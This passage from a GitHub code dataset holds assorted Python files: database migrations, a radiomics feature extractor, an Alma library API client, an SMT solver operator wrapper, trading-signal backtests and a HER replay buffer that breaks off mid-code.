###\n op.drop_table('messages')\n op.drop_table('conversations')\n # ### end Alembic commands ###\n","repo_name":"ShanFalk/BunsInYourArea","sub_path":"migrations/versions/20220812_101057_.py","file_name":"20220812_101057_.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3352736843","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom resources import SOPLS\n\nY_df = pd.read_table('./data/D.txt', index_col=0)\nY = Y_df.values\nX1_df = pd.read_table('./data/A.txt', index_col=0)\nX1 = X1_df.values\nX2_df = pd.read_table('./data/B.txt', index_col=0)\nX2 = X2_df.values\nX3_df = pd.read_table('./data/C.txt', index_col=0)\nX3 = X3_df.values\nX = np.hstack([X1, X2, X3])\nblocks = np.hstack([np.ones(X1.shape[1]),np.ones(X2.shape[1])*2,np.ones(X3.shape[1])*3])\n\nmlf = make_pipeline(SOPLS.SOPLS(blocks=blocks, ncomp=[5,3,7], max_comp=10, wide_data=True))\nmlf.fit(X,Y)\nmlf.predict(X)\nmlf2 = make_pipeline(StandardScaler(),SOPLS.SOPLS(blocks=blocks, ncomp=[5,3,7], max_comp=10, wide_data=True))\nmlf2.fit(X,Y)\nprint(mlf2.predict(X))","repo_name":"NMBU-Data-Science/multi-hoggorm","sub_path":"src/legacy/resources/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33692700772","text":"import wget\nimport gzip\nimport os\nimport re\nimport numpy as np\nimport random\n\n# defining the URLs for the data sets\nURLS = {\n \"GrQc\": \"https://snap.stanford.edu/data/ca-GrQc.txt.gz\",\n \"HepPh\": \"https://snap.stanford.edu/data/ca-HepPh.txt.gz\",\n \"AstroPh\": \"https://snap.stanford.edu/data/ca-AstroPh.txt.gz\",\n \"CondMat\": \"https://snap.stanford.edu/data/ca-CondMat.txt.gz\"\n}\n\n\ndef download_and_extract(url):\n # name of the file to download\n file_name = url.split('/')[-1]\n\n # if the file is not already downloaded, do it\n if file_name not in os.listdir(\".\"):\n wget.download(url=url)\n\n # extracting data\n lines = []\n with gzip.open(file_name, \"r\") as file:\n for line in file:\n lines.append(line)\n return lines\n\n\ndef import_data(path):\n counter = 0\n edges = []\n regex = re.compile(b'[0-9]+')\n with gzip.open(path, 'rb') as file:\n for line in file:\n if counter > 0:\n edge = regex.findall(line)\n if len(edge) == 2:\n edges.append(tuple([str(edge[0]), str(edge[1])]))\n counter += 1\n\n return edges\n\n\ndef quick_sample(set_of_nodes, probabilities):\n \"\"\"\n quickly generate a random element from a set of nodes\n :param set_of_nodes: set of nodes from which we want to return a random sample\n :param probabilities: drawing probabilities in ascending order\n :return: a random node index\n \"\"\"\n return list(set_of_nodes)[np.searchsorted(probabilities, random.random())]\n\n\nif __name__ == \"__main__\":\n data_ = import_data(path='ca-GrQc.txt.gz')\n print(data_)\n","repo_name":"pauldechorgnat/master_thesis","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37036567236","text":"\"\"\"\nAdd Tweet model\n\nRevision ID: f96c8e4abc04\nRevises: 4a68ff6f9e11\nCreate Date: 2018-07-18 00:36:41.290158\n\n\"\"\"\nfrom alembic import op\nfrom microcosm_postgres.models import UTCDateTime\nfrom sqlalchemy import (\n Column,\n 
ForeignKeyConstraint,\n PrimaryKeyConstraint,\n String,\n UniqueConstraint,\n)\nfrom sqlalchemy_utils import UUIDType\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f96c8e4abc04'\ndown_revision = '4a68ff6f9e11'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('tweet',\n Column('id', UUIDType, nullable=False),\n Column('created_at', UTCDateTime(), nullable=False),\n Column('updated_at', UTCDateTime(), nullable=False),\n Column('user_id', UUIDType, nullable=False),\n Column('tweet_content', String(length=280), nullable=False),\n ForeignKeyConstraint(['user_id'], ['user.id'], ),\n PrimaryKeyConstraint('id')\n )\n\n\ndef downgrade():\n op.drop_table('tweet')\n","repo_name":"sindyjlee/rest-api","sub_path":"tweetthis/migrations/f96c8e4abc04_add_tweet_model.py","file_name":"f96c8e4abc04_add_tweet_model.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"42340647204","text":"import json\nimport sys\nfrom carla import *\n\nclass Macchina:\n\n def __init__(self, client, x, y, z, angle=0):\n self.scene = {\"map\": []}\n self.client = client\n\n # Spawn generator\n world = client.get_world()\n bp = world.get_blueprint_library()\n msh = bp.find(\"meshholder.mesh\")\n msh_loc = Location(x=x, y=y, z=z)\n transform = Transform(msh_loc, Rotation(yaw=angle))\n self.generator = world.spawn_actor(msh, transform)\n\n def addObject(self, objectTag, x, y, angle=0):\n self.scene[\"map\"].append({\"obj\": int(objectTag), \"x\": x, \"y\": y, \"angle\": angle})\n\n def spawn(self):\n self.generator.set_scene(json.dumps(self.scene))\n","repo_name":"ThierryDeruyttere/carla-simulator-mac","sub_path":"macchina/macchina.py","file_name":"macchina.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"8915124151","text":"# author: Xia Wei, xiaw@sibet.ac.cn\r\n# paper: Deep Learning for Automatic Differential Diagnosis of\r\n# Primary Central Nervous System Lymphoma and\r\n# Glioblastoma: Multi-parametric MRI based Convolutional\r\n# Neural Network Model\r\n# date: 02/13/2021\r\n\r\n# for radiomics modelling\r\n\r\nimport radiomics.featureextractor as FEE\r\nimport os\r\nimport csv\r\nimport pandas as pd\r\nimport numpy as np\r\nimport SimpleITK as sitk\r\nimport cv2\r\n\r\npara_path = './Params.yaml'\r\nextractor = FEE.RadiomicsFeaturesExtractor(para_path)\r\nextractor.addProvenance(provenance_on=False)\r\nprint(\"Extraction parameters:\\n\\t\", extractor.settings)\r\nprint(\"Enabled filters:\\n\\t\", extractor._enabledImagetypes)\r\nprint(\"Enabled features:\\n\\t\", extractor._enabledFeatures)\r\n\r\ntumor_type = 'GBM'\r\nimg_name = 'T2F'\r\nsuffix = '.nii.gz'\r\nmask_name = 'WholeTumor'\r\n\r\nimg_path = 'R:\\\\brain_tumor\\\\' + tumor_type + '\\\\' + tumor_type + '-nii\\\\'\r\nresult_path = './rad_features_' + tumor_type + '_' + img_name + '.csv'\r\n##\r\nprint('img dir is: ', img_path)\r\n\r\ndf = pd.DataFrame()\r\n\r\nif os.path.exists(img_path):\r\n dir_name_list = os.listdir(img_path)\r\n dir_name_list = list(map(int, dir_name_list))\r\n dir_name_list.sort()\r\n num = 0\r\n for nii_dir in dir_name_list: # nii_dir -- patient ID, and include all imgs and mask\r\n img_path_i = img_path + str(nii_dir) + '\\\\' + img_name + suffix\r\n mask_path_i = img_path + str(nii_dir) + '\\\\' + mask_name + suffix\r\n assert os.path.exists(img_path_i) and os.path.exists(mask_path_i)\r\n\r\n 
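# load the tumor mask and the MR volume for this patient before extracting features\r\n 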
roi = sitk.ReadImage(mask_path_i)\r\n image = sitk.ReadImage(img_path_i)\r\n # image = sitk.Normalize(image) # normalize: True\r\n\r\n result = extractor.execute(image, roi)\r\n # except Exception:\r\n # print(dirName)\r\n # exit(1)\r\n keys, values = ['id'], [str(nii_dir)]\r\n for k, v in result.items():\r\n keys.append(k)\r\n values.append(v)\r\n\r\n if num == 0:\r\n df = pd.DataFrame(columns=keys)\r\n df.loc[str(nii_dir)] = values\r\n else:\r\n df.loc[str(nii_dir)] = values\r\n\r\n print(\"Result type:\", type(result)) # result is returned in a Python ordered dictionary\r\n print()\r\n print(str(nii_dir))\r\n print(\"patient \" + str(nii_dir) + \"--\" + tumor_type + '_' + img_name + \" Features Calculated\")\r\n num = num + 1\r\n # df.drop(df.columns[0], axis=1, inplace=True)\r\n df.to_csv(result_path, index=False)\r\n","repo_name":"xiawei999000/GBM_PCNSL_CNN_modeling","sub_path":"radiomics_modeling/feature_extraction_program/pyra_feaex.py","file_name":"pyra_feaex.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"60"} +{"seq_id":"17147710442","text":"import json\nimport logging\nimport time\nfrom datetime import datetime\nfrom typing import Generator, Optional\nfrom urllib.parse import urljoin\n\nimport requests\n\nfrom sapinvoices.config import load_config_values as load_alma_config\n\nlogger = logging.getLogger(__name__)\n\n\nclass AlmaClient:\n \"\"\"AlmaClient class.\n\n An Alma API client with specific functionality necessary for SAP\n processing.\n\n Notes:\n - All requests to the Alma API include a 0.1 second wait to ensure we don't\n exceed the API rate limit.\n - If no records are found for a given endpoint with the provided parameters,\n Alma will still return a 200 success response with a json object of\n {\"total_record_count\": 0} and these methods will return that object.\n\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize AlmaClient instance.\"\"\"\n alma_config = load_alma_config()\n self.base_url = alma_config[\"ALMA_API_URL\"]\n self.headers = {\n \"Authorization\": f\"apikey {alma_config['ALMA_API_READ_WRITE_KEY']}\",\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\",\n }\n self.timeout = float(alma_config[\"TIMEOUT\"])\n\n def create_invoice(self, invoice_json: dict) -> dict:\n \"\"\"Create an invoice.\n\n Creates an invoice in alma using the acquisitions/invoices API endpoint\n\n Args:\n invoice_json: a python dict representing an invoice object as described here\n - https://developers.exlibrisgroup.com/alma/apis/docs/xsd/rest_invoice.xsd/\n\n \"\"\"\n endpoint = \"acq/invoices\"\n result = requests.post(\n urljoin(self.base_url, endpoint),\n headers=self.headers,\n timeout=self.timeout,\n data=json.dumps(invoice_json),\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n\n def create_invoice_line(self, invoice_id: str, invoice_line_json: dict) -> dict:\n \"\"\"Create an invoice line for a given invoice Id.\n\n Args:\n invoice_id: the alma id number of an invoice\n invoice_line_json: a python dict representing an invoice object as described\n here: https://developers.exlibrisgroup.com/alma/apis/docs/xsd/\n rest_invoice_line.xsd/\n\n \"\"\"\n endpoint = f\"acq/invoices/{invoice_id}/lines\"\n result = requests.post(\n urljoin(self.base_url, endpoint),\n headers=self.headers,\n timeout=self.timeout,\n data=json.dumps(invoice_line_json),\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n\n def 
create_vendor(self, vendor_json: dict) -> dict:\n \"\"\"Create a vendor record.\n\n Args:\n vendor_json: a python dict representing an invoice object as described\n here: https://developers.exlibrisgroup.com/alma/apis/docs/xsd/rest_vendor.xsd/\n\n \"\"\"\n endpoint = \"acq/vendors\"\n result = requests.post(\n urljoin(self.base_url, endpoint),\n headers=self.headers,\n timeout=self.timeout,\n data=json.dumps(vendor_json),\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n\n def get_paged(\n self,\n endpoint: str,\n record_type: str,\n params: Optional[dict] = None,\n limit: int = 100,\n _offset: int = 0,\n _records_retrieved: int = 0,\n ) -> Generator[dict, None, None]:\n \"\"\"Retrieve paginated results from the Alma API for a given endpoint.\n\n Args:\n endpoint: The paged Alma API endpoint to call, e.g. \"acq/invoices\".\n record_type: The type of record returned by the Alma API for the specified\n endpoint, e.g. \"invoice\" record_type returned by the \"acq/invoices\"\n endpoint. See for example.\n params: Any endpoint-specific params to supply to the GET request.\n limit: The maximum number of records to retrieve per page. Valid values are\n 0-100.\n _offset: The offset value to supply to paged request. Should only be used\n internally by this method's recursion.\n _records_retrieved: The number of records retrieved so far for a given\n paged endpoint. Should only be used internally by this method's\n recursion.\n\n \"\"\"\n params = params or {}\n params[\"limit\"] = limit\n params[\"offset\"] = _offset\n response = requests.get(\n url=urljoin(self.base_url, endpoint),\n params=params,\n headers=self.headers,\n timeout=self.timeout,\n )\n response.raise_for_status()\n time.sleep(0.1)\n total_record_count = response.json()[\"total_record_count\"]\n records = response.json().get(record_type, [])\n records_retrieved = _records_retrieved + len(records)\n for record in records:\n yield record\n if records_retrieved < total_record_count:\n yield from self.get_paged(\n endpoint,\n record_type,\n params=params,\n limit=limit,\n _offset=_offset + limit,\n _records_retrieved=records_retrieved,\n )\n\n def get_fund_by_code(self, fund_code: str) -> dict:\n \"\"\"Get fund details using the fund code.\"\"\"\n endpoint = \"acq/funds\"\n params = {\"q\": f\"fund_code~{fund_code}\", \"view\": \"full\"}\n result = requests.get(\n urljoin(self.base_url, endpoint),\n headers=self.headers,\n params=params,\n timeout=self.timeout,\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n\n def get_invoices_by_status(self, status: str) -> Generator[dict, None, None]:\n \"\"\"Get all invoices with a provided status.\"\"\"\n invoice_params = {\n \"invoice_workflow_status\": status,\n }\n return self.get_paged(\"acq/invoices\", \"invoice\", params=invoice_params)\n\n def get_vendor_details(self, vendor_code: str) -> dict:\n \"\"\"Get vendor info from Alma.\"\"\"\n endpoint = f\"acq/vendors/{vendor_code}\"\n result = requests.get(\n url=urljoin(self.base_url, endpoint),\n headers=self.headers,\n timeout=self.timeout,\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n\n def get_vendor_invoices(self, vendor_code: str) -> Generator[dict, None, None]:\n \"\"\"Get invoices for a given vendor code.\"\"\"\n endpoint = f\"acq/vendors/{vendor_code}/invoices\"\n return self.get_paged(endpoint, \"invoice\")\n\n def mark_invoice_paid(\n self,\n invoice_id: str,\n payment_date: datetime,\n payment_amount: str,\n payment_currency: str,\n ) -> None:\n 
\"\"\"Mark an invoice as paid using the invoice process endpoint.\"\"\"\n endpoint = f\"acq/invoices/{invoice_id}\"\n params = {\"op\": \"paid\"}\n invoice_payment_data = {\n \"payment\": {\n \"voucher_date\": payment_date.strftime(\"%Y-%m-%dT12:00:00Z\"),\n \"voucher_amount\": payment_amount,\n \"voucher_currency\": {\"value\": payment_currency},\n }\n }\n result = requests.post(\n url=urljoin(self.base_url, endpoint),\n headers=self.headers,\n params=params,\n timeout=self.timeout,\n data=json.dumps(invoice_payment_data),\n )\n result.raise_for_status()\n time.sleep(0.1)\n if not result.json()[\"payment\"][\"payment_status\"][\"value\"] == \"PAID\":\n raise ValueError\n\n def process_invoice(self, invoice_id: str) -> dict:\n \"\"\"Move an invoice to in process using the invoice process endpoint.\"\"\"\n endpoint = f\"acq/invoices/{invoice_id}\"\n params = {\"op\": \"process_invoice\"}\n result = requests.post(\n urljoin(self.base_url, endpoint),\n headers=self.headers,\n params=params,\n timeout=self.timeout,\n data=\"{}\",\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n","repo_name":"MITLibraries/alma-sapinvoices","sub_path":"sapinvoices/alma.py","file_name":"alma.py","file_ext":"py","file_size_in_byte":8416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27213354263","text":"# -*-coding: utf-8 -*-\n# Python 3.6\n# Author:Zhang Haitao\n# Email:13163385579@163.com\n# TIME:2018-07-18 09:46\n# NAME:FT_hp-combine.py\nfrom singleFactor.compare_with_smoothed import find_best_smooth_period\nimport multiprocessing\nimport pickle\nfrom functools import partial\nimport matplotlib.pyplot as plt\nfrom backtest.main import quick\nfrom config import DIR_SIGNAL, DIR_SINGLE_BACKTEST, DIR_SIGNAL_SMOOTHED, \\\n DIR_SIGNAL_PARAMETER, DIR_TMP, DIR_SIGNAL_COMB\nimport os\nimport numpy as np\nimport pandas as pd\nfrom singleFactor.backtest_signal import SMOOTH_PERIODS, get_signal_direction, \\\n get_smoothed_signal\nfrom tools import outlier, z_score\n\nnames = os.listdir(os.path.join(DIR_SIGNAL_SMOOTHED, '0'))\nret_df = pd.DataFrame(index=names, columns=SMOOTH_PERIODS, dtype=float)\n\n\ndef traverse_one_sp(sp):\n fns=os.listdir(os.path.join(DIR_SIGNAL_SMOOTHED,str(sp)))\n get_sharpe=lambda fn:pd.read_csv(os.path.join(DIR_SIGNAL_SMOOTHED,str(sp),fn,'hedged_perf.csv'),index_col=0,header=None).loc['sharp_ratio'].values[0]\n return pd.Series([get_sharpe(fn) for fn in fns],index=fns)\n\ndef standardize_signal(signal):\n '''\n Args:\n signal:DataFrame, panel\n\n Returns:DataFrame, panel,the shape may be different with the input dataframe\n\n '''\n stk=signal.stack()\n stk=stk.groupby('trd_dt').apply(outlier)\n stk=stk.groupby('trd_dt').apply(z_score)\n return stk.unstack()\n\n\ndef select_with_sharpe(thresh=1.0):\n '''\n\n Args:\n thresh:least sharpe value to be selected\n\n Returns:DataFrame,with two columns,['sahrpe','sp']\n\n '''\n ss=multiprocessing.Pool(10).map(traverse_one_sp,SMOOTH_PERIODS)\n sharpe_info=pd.concat(ss,axis=1,keys=SMOOTH_PERIODS)\n\n # sharpe_info = pd.read_csv(os.path.join(DIR_SIGNAL_COMB, 'sharpe_info.csv'),\n # index_col=0)\n sp = sharpe_info[sharpe_info > thresh].idxmax(axis=1).sort_values().dropna()\n sharpe = sharpe_info.loc[sp.index].max(axis=1)\n result = pd.concat([sp, sharpe], axis=1, keys=['sp', 'sharpe']).sort_values(\n 'sp', ascending=False)\n\n result.to_csv(os.path.join(DIR_SIGNAL_COMB, 'selected_indicators.csv'))\n\n\n\n\ndef get_outer_frame(dflist):\n indsets=[set(df.index.tolist()) for 
df in dflist]\n colsets=[set(df.columns.tolist()) for df in dflist]\n indOuter=sorted(list(set.union(*indsets)))\n colOuter=sorted(list(set.union(*colsets)))\n return [df.reindex(index=indOuter,columns=colOuter) for df in dflist]\n\n\ndef get_mixed_signal():\n manually_selcted=pd.read_csv(os.path.join(DIR_SIGNAL_COMB,'manually_selected.csv'),index_col=0)\n manually_selcted=manually_selcted.dropna()\n\n for c in manually_selcted['manually_selected'].unique():\n subdf=manually_selcted[manually_selcted['manually_selected']==c]\n signals=[]\n for name,row in subdf.iterrows():\n sp=row['sp']\n signal=pd.read_pickle(os.path.join(DIR_SIGNAL,name+'.pkl'))*get_signal_direction(name)\n signal=standardize_signal(signal)#trick: standardize the signal before aggregation\n if sp:\n signal=get_smoothed_signal(signal,sp)\n # signal=signal.rolling(sp,min_periods=int(sp/2)).mean()\n # signals.append(signal.stack())\n signals.append(signal)\n print(c,name)\n\n signals=get_outer_frame(signals)\n #TODO: standardized before aggregation\n mixed=pd.DataFrame(np.nanmean([s.values for s in signals],axis=0),index=signals[0].index,columns=signals[0].columns)\n\n mixed.to_pickle(os.path.join(DIR_SIGNAL_COMB,'mixed_signal',c+'.pkl'))\n\n\n\ndef backtest_one(fn):\n name=fn[:-4]\n directory=os.path.join(DIR_SIGNAL_COMB,'combine',name)\n if not os.path.exists(directory):\n os.makedirs(directory)\n else:\n return\n\n signal=pd.read_pickle(os.path.join(DIR_SIGNAL_COMB,'mixed_signal',name+'.pkl'))\n results,fig=quick(signal,name,start='2010')\n fig.savefig(os.path.join(directory, name + '.png'))\n for k in results.keys():\n results[k].to_csv(os.path.join(directory, k + '.csv'))\n\n\ndef backtest_mixed_mixed(selected=True):\n fns=os.listdir(os.path.join(DIR_SIGNAL_COMB,'mixed_signal'))\n if selected:\n fns=[fn for fn in fns if fn[:-4] in ['C','Q','V']]\n name='cqv'\n else:\n name='mixed'\n signals=[]\n for fn in fns:\n signal=pd.read_pickle((os.path.join(DIR_SIGNAL_COMB,'mixed_signal',fn)))\n signal=standardize_signal(signal)\n signals.append(signal)\n print(fn)\n signals=get_outer_frame(signals)\n mixed = pd.DataFrame(np.nanmean([s.values for s in signals], axis=0),\n index=signals[0].index, columns=signals[0].columns)\n\n directory=os.path.join(DIR_SIGNAL_COMB,'combine',name)\n if not os.path.exists(directory):\n os.makedirs(directory)\n else:\n return\n\n results,fig=quick(mixed,name,start='2010')\n fig.savefig(os.path.join(directory, '{}.png'.format(name)))\n for k in results.keys():\n results[k].to_csv(os.path.join(directory, k + '.csv'))\n\n\nif __name__ == '__main__':\n # select_with_sharpe()\n\n # get_mixed_signal()\n # fns = os.listdir(os.path.join(DIR_SIGNAL_COMB, 'mixed_signal'))\n # multiprocessing.Pool(5).map(backtest_one,fns)\n\n backtest_mixed_mixed()\n","repo_name":"dxcv/FT","sub_path":"singleFactor/combine/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36313643092","text":"# This file is part of the smt-switch project.\n# See the file LICENSE in the top-level source directory for licensing information.\n\nimport sys\nimport enum\nfrom collections import OrderedDict, Sequence\nfrom functools import partial\nfrom ..util import namedtuple_with_defaults\n\n\nfdata = namedtuple_with_defaults('fdata', 'num_indices, min_arity, max_arity, custom')\n\n\n# special definitions for And/Or\n# this is just to support the And([]) --> True, Or([])-->False cases\ndef _And(*args):\n 
'''\n Custom and function defined for And([]) --> True, and And(x) --> x\n\n '''\n\n if len(args) == 0:\n return True\n\n elif len(args) == 1:\n return args[0]\n\n else:\n raise ValueError('Custom And should not be called with >= 2 args')\n\n\ndef _Or(*args):\n\n if len(args) == 0:\n return False\n\n elif len(args) == 1:\n return args[0]\n\n else:\n raise ValueError('Custom Or should not be called with >= 2 args')\n\n\n# Use strings here so that enums are automatically generated\n# if used enum here, would have to write function twice\n# once in enum and once to connect with data\n\n# make it an OrderedDict so that enum values are always the same\nfunc_symbols = OrderedDict([('And', fdata(0, 2, sys.maxsize, _And)),\n ('Or', fdata(0, 2, sys.maxsize, _Or)),\n ('Equals', fdata(0, 2, 2)),\n ('Not', fdata(0, 1, 1)),\n ('Ite', fdata(0, 3, 3)),\n ('Sub', fdata(0, 2, 2)),\n ('Add', fdata(0, 2, sys.maxsize)),\n ('LT', fdata(0, 2, 2)),\n ('GT', fdata(0, 2, 2)),\n ('LEQ', fdata(0, 2, 2)),\n ('GEQ', fdata(0, 2, 2)),\n ('Extract', fdata(2, 1, 1)),\n ('Concat', fdata(0, 2, 2)),\n ('ZeroExt', fdata(0, 2, 2)),\n ('BVAnd', fdata(0, 2, 2)),\n ('BVOr', fdata(0, 2, 2)),\n ('BVXor', fdata(0, 2, 2)),\n ('BVAdd', fdata(0, 2, 2)),\n ('BVSub', fdata(0, 2, 2)),\n ('BVMul', fdata(0, 2, 2)),\n ('BVUdiv', fdata(0, 2, 2)),\n ('BVUrem', fdata(0, 2, 2)),\n ('BVShl', fdata(0, 2, 2)),\n ('BVAshr', fdata(0, 2, 2)),\n ('BVLshr', fdata(0, 2, 2)),\n ('BVUlt', fdata(0, 2, 2)),\n ('BVUle', fdata(0, 2, 2)),\n ('BVUgt', fdata(0, 2, 2)),\n ('BVUge', fdata(0, 2, 2)),\n ('BVSlt', fdata(0, 2, 2)),\n ('BVSle', fdata(0, 2, 2)),\n ('BVSgt', fdata(0, 2, 2)),\n ('BVSge', fdata(0, 2, 2)),\n ('BVNot', fdata(0, 1, 1)),\n ('BVNeg', fdata(0, 1, 1)),\n ('Select', fdata(0, 2, 2)),\n ('Store', fdata(0, 3, 3)),\n ('No_op', fdata(0, 0, 0)),\n ('_ApplyUF', fdata(0, 1, sys.maxsize)),\n ('Distinct', fdata(0, 2, sys.maxsize))])\n\n\n# generate enums for each of these function symbols\nfunc_d = dict()\n\nfor fname, i in zip(func_symbols.keys(), range(0, len(func_symbols))):\n func_d[fname] = i\n\nfunc_enum = enum.Enum('func_enum', func_d)\n\n# to make it iterable\nfunc_enum.__order__ = func_symbols.keys()\n\n\nclass operator:\n '''\n Class that wraps all functions, builtin or defined.\n\n Allows for partial evaluations\n\n _gen_operator ensures that the partial evaluations are only for the number\n of indexes in an indexed operator (normal operators have num_index == 0)\n\n e.g. 
bvult can not be partially evaluated except with 0 arguments (because it is not indexed)\n on the other hand, extract can be partially evaluated with it's high and low bits\n\n ex4_2 = functions.extract(4, 2)\n ex4_2(bv)\n\n is equivalent to:\n\n functions.extract(4, 2, bv)\n\n ex4_2 == functions.extract(4, 2) will return True\n '''\n\n def __init__(self, smt, func_info, fdata, *args, **kwargs):\n self._smt = smt\n self._f_imp = None\n \n if issubclass(func_info.__class__, enum.Enum):\n self._fname = func_info.name\n self._f_id = func_info\n self._f_type = \"builtin\"\n elif isinstance(func_info, tuple):\n assert len(func_info) in {2, 3}, \\\n \"Expecting function to be (name, solver object) \" + \\\n \"with a third parameter for the implementation if \" + \\\n \"it's a define-fun macros\"\n self._fname = func_info[0]\n self._f_id = func_info[1]\n self._f_type = \"uf\"\n if len(func_info) == 3:\n self._f_imp = func_info[2]\n self._f_type = \"macro\"\n self._fdata = fdata\n self._args = args\n self._keywords = kwargs\n\n def __eq__(self, other):\n return self._fname == other._fname and self._args == other._args \\\n and self._keywords == other._keywords\n\n def __ne__(self, other):\n return self._fname != other._fname or self._args != other._args \\\n or self._keywords != other._keywords\n\n @property\n def fname(self):\n return self._fname\n\n @property\n def f_id(self):\n return self._f_id\n\n @property\n def f_type(self):\n return self._f_type\n\n @property\n def args(self):\n return self._args\n\n @property\n def keywords(self):\n return self._p.keywords\n\n def __repr__(self):\n return ''.format(self._fname, self._args, self._keywords)\n\n def __call__(self, *args, **kwargs):\n if args and isinstance(args[0], Sequence):\n args = args[0]\n\n if len(self._args) == 0 and len(args) == self._fdata.num_indices:\n\n # check for custom behavior\n if self._fdata.num_indices == 0 and self._fdata.custom and not self._smt.strict:\n return self._fdata.custom(*args)\n\n else:\n return operator(self._smt, self._f_id, self._fdata, *args, **kwargs)\n\n elif len(self._args) == self._fdata.num_indices and len(args) >= self._fdata.min_arity:\n if self._smt.strict and len(args) > self._fdata.max_arity:\n raise ValueError('In strict mode and received {} args when max arity = '\n .format(len(args), fdata.max_arity))\n\n return self._smt.ApplyFun(self, *args, **kwargs)\n\n elif len(args) >= self._fdata.num_indices + self._fdata.min_arity:\n if self._smt.strict and len(args) - self._fdata.num_indices > self._fdata.max_arity:\n raise ValueError('In strict mode and received {} function indices and' +\n ' {} args when max arity = '\n .format(self._fdata.num_indices,\n len(args) - self._fdata.num_indices, fdata.max_arity))\n\n # always pass an operator with the minumum number of arguments\n # this is for CVC4 to construct the function\n op = operator(self._smt, self._f_id, self._fdata,\n *args[:self._fdata.num_indices])\n\n args = args[self._fdata.num_indices:]\n\n return self._smt.ApplyFun(op, *args, **kwargs)\n\n else:\n # check for custom behaviour\n if self._fdata.custom and not self._smt.strict:\n return self._fdata.custom(*args, **kwargs)\n\n elif fdata.num_indices == 0:\n # non-indexed operator\n raise ValueError('Expected {} inputs to operator but received {}'\n .format(fdata.min_arity, len(args)))\n else:\n raise ValueError('Undefined behaviour for {}{}'\n .format(self, args))\n\n def __hash__(self):\n return (self._fname, 
self._args).__hash__()\n","repo_name":"makaimann/py-smt-switch","sub_path":"smt_switch/src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":8400,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"74116391871","text":"import unittest\nfrom src.helpers import *\nfrom src.core.tree import *\n\n\nclass TreeToAsciiTests(unittest.TestCase):\n def test_tree_to_ascii(self):\n test = \"\"\" ┌─ 2 \n │ \n─┼─ 3 \n │ \n └─ 4 \"\"\"\n tree = TreeNode(name=\"1\")\n child1 = TreeNode(name=\"2\")\n child2 = TreeNode(name=\"3\")\n child3 = TreeNode(name=\"4\")\n tree.add_child(child1)\n tree.add_child(child2)\n tree.add_child(child3)\n\n self.assertEqual(tree.__str__(), test)","repo_name":"AaronVr/phylo_trees","sub_path":"tests/helpers/tree_to_ascii_tests.py","file_name":"tree_to_ascii_tests.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18159136995","text":"def solution(prices):\n length = len(prices)\n answer = [0] * length\n stack = []\n arr = []\n for x, i in enumerate(prices):\n arr.append([x, i])\n\n i = 0\n while i < length:\n x = arr[i]\n if len(stack) == 0:\n stack.append(x)\n i += 1\n else:\n # When the top element of the stack is higher than the element being compared\n if stack[-1][1] > x[1]:\n idx = stack[-1][0]\n answer[idx] = x[0] - idx\n stack.pop()\n else:\n stack.append(x)\n i += 1\n # print(stack)\n\n while len(stack) != 0:\n x = stack[-1]\n answer[x[0]] = length - x[0] -1\n stack.pop()\n\n return answer\n\n\nprint(solution([1, 2, 3, 2, 3]))\n","repo_name":"Kyun2da/Algorithm","sub_path":"python/programmers/level2/주식가격.py","file_name":"주식가격.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"44592863155","text":"from rlf.storage.transition_storage import TransitionStorage\nimport torch\nimport rlf.rl.utils as rutils\nimport numpy as np\n\ndef create_her_storage_buff(obs_space, action_space, buff_size, args):\n return HerStorage(obs_space, action_space, buff_size, args)\n\nclass HerStorage(TransitionStorage):\n \"\"\"\n Uses the \"final\" HER strategy which uses the state achieved at the end of\n the trajectory.\n Observation should have format:\n {\n \"achieved_goal\": tensor\n \"desired_goal\": tensor\n \"observation\": tensor\n }\n Arguments are in `OffPolicy`\n \"\"\"\n\n def _on_traj_done(self, done_trajs):\n for done_traj in done_trajs:\n for t in range(len(done_traj) - 1):\n state = done_traj[t][0].copy()\n next_state = done_traj[t+1][0].copy()\n\n if t == 0:\n mask = 1.0\n else:\n mask = done_traj[t-1][2]\n\n def push_trans(state, next_state):\n if torch.allclose(next_state['desired_goal'],\n next_state['achieved_goal'], 0.0001):\n reward = 1.0\n next_mask = 0.0\n else:\n reward = done_traj[t][4]\n next_mask = done_traj[t][2]\n\n self._push_transition({\n 'action': 